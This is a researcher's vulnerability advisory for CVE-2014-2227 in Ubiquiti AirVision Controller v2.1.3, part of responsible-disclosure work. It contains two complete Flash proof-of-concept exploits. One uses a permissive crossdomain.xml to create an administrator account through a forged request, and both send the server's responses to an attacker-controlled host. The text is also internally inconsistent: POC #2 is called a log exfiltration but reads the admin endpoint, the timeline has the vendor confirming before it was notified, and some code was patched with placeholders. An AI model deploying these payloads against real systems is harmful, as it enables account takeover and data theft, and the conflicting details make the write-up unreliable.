CVE-2014-2227
This CVE covers a vulnerability found in the Ubiquiti Networks AirVision application. For more background on this particular vulnerability, check out this post:
Exploiting misconfigured crossdomain.xml files
In fact, I wrote that first crossdomain.xml blog post after finding this AirVision vulnerability back in February. If you already read that post, you should recognize that the vulnerable form I use for the POC here (adding an administrator) is the same one I used earlier.
Here is a cleaned up version of what I sent to Ubiquiti back in February:
AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml
Misuse Case
If the victim user is authenticated with their AirVision Controller, and they visit a malicious site, the owner of the malicious site can make changes to, and read data from, the AirVision Controller. The malicious site can even add a new administrative user account.
Vulnerable default configuration:
POC:
Step 1: The attacker hosts the malicious SWF on his/her server and socially engineers a victim AirVision administrator, who is currently logged in, into viewing the SWF file.
Step 2: The victim, while logged into AirVision, views the SWF file on the attacker's server:
Step 3: The SWF loads on the victim's machine and makes a request on behalf of the victim (exploiting CSRF to add an administrator):
Response:
Step 4: Because of the overly permissive crossdomain.xml file, the SWF is able to bypass the Same-Origin Policy: it records the server's response to the previous request and sends that to the attacker:
The attacker's server receives the information and responds with an HTTP 200 OK.
Here is another example of how an attacker could exploit this vulnerability, one that is quite different from what CSRF alone can do. In the screenshot below, the SWF makes a request to /api/2.0/log?type=error. The SWF then reads the data that comes back from that request and sends it to the attacker's server, where the attacker consumes the raw data.
Additional details:
-----------
(CVE-2014-2227) - Ubiquiti Networks - AirVision v2.1.3 - Overly Permissive default crossdomain.xml
-----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)
----------------------------------------------
Affected Products/Versions:
----------------------------------------------
AirVision Controller v2.1.3
Note: Previous versions may be affected
-----------------
Description:
-----------------
Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
Researcher: Seth Art - @sethsec
------------------------------------------------------------------------------------------------------
POC #1: Using crossdomain.xml to execute CSRF and add an administrator:
------------------------------------------------------------------------------------------------------
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;
    import flash.net.URLRequestHeader;

    public class XDomainXploit3 extends Sprite {
        public function XDomainXploit3() {
            // Target URL from where the data is to be retrieved
            var readFrom:String = "https://victim:7443/api/2.0/admin";
            var header:URLRequestHeader = new URLRequestHeader("Content-Type",
                "text/plain; charset=UTF-8");
            var readRequest:URLRequest = new URLRequest(readFrom);
            readRequest.method = URLRequestMethod.POST;
            // JSON body of the "add administrator" form; the browser attaches the victim's session cookie
            readRequest.data =
                "{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@gmail.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
            readRequest.requestHeaders.push(header);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            // (placeholder: the declaration was missing from the published POC)
            var sendTo:String = "http://ATTACKER_HOST/collect";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
-----------------------------------------------------------------------
POC #2: Using crossdomain.xml to exfiltrate log data:
-----------------------------------------------------------------------
// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;

    public class XDomainXploit extends Sprite {
        public function XDomainXploit() {
            // Target URL from where the data is to be retrieved (plain GET; the browser attaches the victim's session cookie)
            var readFrom:String = "https://victim:7443/api/2.0/admin";
            var readRequest:URLRequest = new URLRequest(readFrom);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent
            // (placeholder: the declaration was missing from the published POC)
            var sendTo:String = "http://ATTACKER_HOST/collect";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
-------------
Solution:
-------------
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: The application name changed from AirVision to UniFi Video)
-----------------------------
Disclosure Timeline:
-----------------------------
2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquiti confirms receipt of AirVision report and existence of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure